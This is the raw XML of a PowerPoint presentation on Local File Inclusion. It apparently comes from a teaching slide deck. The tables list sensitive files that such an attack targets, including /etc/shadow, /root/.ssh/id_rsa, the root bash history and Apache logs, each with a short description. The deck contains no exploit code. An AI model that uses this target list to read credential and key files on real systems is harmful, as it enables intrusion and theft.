                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="500206">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/root/.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>bash_history</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>contains the history commands for root user</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="490079">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/shadow</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>contains information about the system's users' passwords</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="490079">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>dmessage</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>contains global system messages, including the messages that are logged during system </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>startup</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2215615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76706237"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="12192000" cy="1483360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3589361"/>
                <a:gridCol w="8602639"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/mail/root</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>all emails for root user</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/root/.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ssh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>id_rsa</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Private SSH keys for a root or any known valid user on the server</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/log/apache2/access.log</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>the accessed requests for Apache  webserver</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>C:\boot.ini</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>contains the boot options for computers with BIOS firmware</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3674456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lgn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Inclusion (﻿LFI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16325339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311</TotalTime>
  <Words>616</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>131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ROCKTIM</dc:creator>
  <cp:lastModifiedBy>ROCKTIM</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-14T18:20:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-19T16:36:19Z</dcterms:modified>
</cp:coreProperties>
</file>